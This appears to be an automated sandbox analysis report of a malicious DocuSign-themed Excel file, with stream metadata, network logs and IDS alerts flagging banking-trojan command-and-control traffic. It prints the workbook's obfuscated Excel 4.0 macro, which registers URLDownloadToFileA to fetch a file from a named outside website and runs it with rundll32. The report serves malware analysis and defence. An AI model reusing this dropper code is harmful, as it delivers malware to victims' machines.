Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 ec 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 ac 00 00 00 02 00 00 00 e3 04 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.247217286775 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 |
Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 157800 |
---|
General | |
---|---|
Stream Path: | Workbook |
File Type: | Applesoft BASIC program data, first line number 16 |
Stream Size: | 157800 |
Entropy: | 7.46869820242 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . |
Data Raw: | 09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
Macro 4.0 Code |
---|
,,,,,,,,,"=RIGHT(""353454543rtertetr,DllRegister"",12)&V19",,,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""KJHDFHURNVUTRSHYSTNLUURTHNBDZZLRDNYZru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,,,,,,=HALT(),,,
"=FORMULA.FILL(A144,DocuSign!V19)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""YJDYJGYDJNUDTUXTNXYXNuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""JDHNLTVJRBNZXKHTFHNMXTFUXTownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCC""&A146,""YUTVUBSRNYTMYM"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=YUTVUBSRNYTMYM(0,T137&D144&E144&E145&E146&E147,D141,0,0)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""hLKUYFBGVESLTNZBRHYMHYRZndll32"",6)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""XCVBDSTYFGYSDUZGKLRDHZTDJ..\BASE.BABAA"",13)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,Server,,,www.chipmania.it/mails/open,.,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,BB,,,,h,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
02/20/21-02:16:54.765622 | TCP | 2404324 | ET CNC Feodo Tracker Reported CnC Server TCP group 13 | 49166 | 443 | 192.168.2.22 | 200.52.147.93 |
02/20/21-02:18:53.303160 | TCP | 2404306 | ET CNC Feodo Tracker Reported CnC Server TCP group 4 | 49167 | 443 | 192.168.2.22 | 142.202.191.164 |
02/20/21-02:18:55.128222 | TCP | 2404320 | ET CNC Feodo Tracker Reported CnC Server TCP group 11 | 49169 | 443 | 192.168.2.22 | 193.8.194.96 |
02/20/21-02:18:55.532096 | TCP | 2021013 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) | 443 | 49169 | 193.8.194.96 | 192.168.2.22 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 20, 2021 02:16:43.694610119 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.752089024 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.752243042 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.753083944 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.813005924 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.822292089 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.822345972 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.822381973 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.822411060 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.822443008 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.822474003 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.822495937 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.822505951 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.822525024 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.822530031 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.822535038 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.822539091 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.822539091 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.822565079 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.822571993 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.822609901 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.822611094 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.822644949 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.822664022 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.827573061 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.882463932 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.882489920 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.882503033 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.882517099 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.882530928 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.882544041 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.882561922 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.882590055 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.882601976 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.882616043 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.882627964 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.882638931 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.882646084 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.882649899 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.882668018 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.882685900 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.882702112 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.882700920 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.882749081 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.882765055 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.882783890 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.882792950 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.882796049 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.882810116 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.882862091 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.882894993 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.884835005 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.942574024 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.942631960 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.942673922 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.942691088 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.942713976 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.942715883 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.942722082 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.942764044 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.942773104 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.942809105 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.942821980 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.942850113 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.942864895 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.942889929 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.942919970 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.942949057 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.942981005 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.942987919 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.943025112 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.943028927 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.943069935 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.943080902 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.943084955 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.943119049 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.943119049 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.943162918 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.943192005 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.943202019 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.943212986 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.943242073 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.943259001 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.943284035 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.943301916 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.943329096 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.943341017 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.943371058 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.943392992 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.943412066 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.943423986 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.943463087 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.943476915 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.943509102 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.943512917 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.943547964 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.943553925 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.943587065 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:16:43.943592072 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:16:43.943627119 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 20, 2021 02:16:43.609155893 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 02:16:43.670814037 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 02:18:53.927275896 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 02:18:53.986989021 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 02:18:53.993416071 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 02:18:54.043324947 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 02:18:56.465553999 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 02:18:56.518466949 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 02:18:56.523504972 CET | 49548 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 02:18:56.574853897 CET | 53 | 49548 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Feb 20, 2021 02:16:43.609155893 CET | 192.168.2.22 | 8.8.8.8 | 0x8c10 | Standard query (0) | A (IP address) | IN (0x0001) | |
Feb 20, 2021 02:18:56.465553999 CET | 192.168.2.22 | 8.8.8.8 | 0xa6ed | Standard query (0) | A (IP address) | IN (0x0001) | |
Feb 20, 2021 02:18:56.523504972 CET | 192.168.2.22 | 8.8.8.8 | 0x4a40 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Feb 20, 2021 02:16:43.670814037 CET | 8.8.8.8 | 192.168.2.22 | 0x8c10 | No error (0) | chipmania.it | CNAME (Canonical name) | IN (0x0001) | ||
Feb 20, 2021 02:16:43.670814037 CET | 8.8.8.8 | 192.168.2.22 | 0x8c10 | No error (0) | 185.81.0.78 | A (IP address) | IN (0x0001) | ||
Feb 20, 2021 02:18:56.518466949 CET | 8.8.8.8 | 192.168.2.22 | 0xa6ed | No error (0) | api.ip.sb.cdn.cloudflare.net | CNAME (Canonical name) | IN (0x0001) | ||
Feb 20, 2021 02:18:56.574853897 CET | 8.8.8.8 | 192.168.2.22 | 0x4a40 | No error (0) | api.ip.sb.cdn.cloudflare.net | CNAME (Canonical name) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49165 | 185.81.0.78 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Feb 20, 2021 02:16:43.753083944 CET | 0 | OUT | |
Feb 20, 2021 02:16:43.822292089 CET | 2 | IN |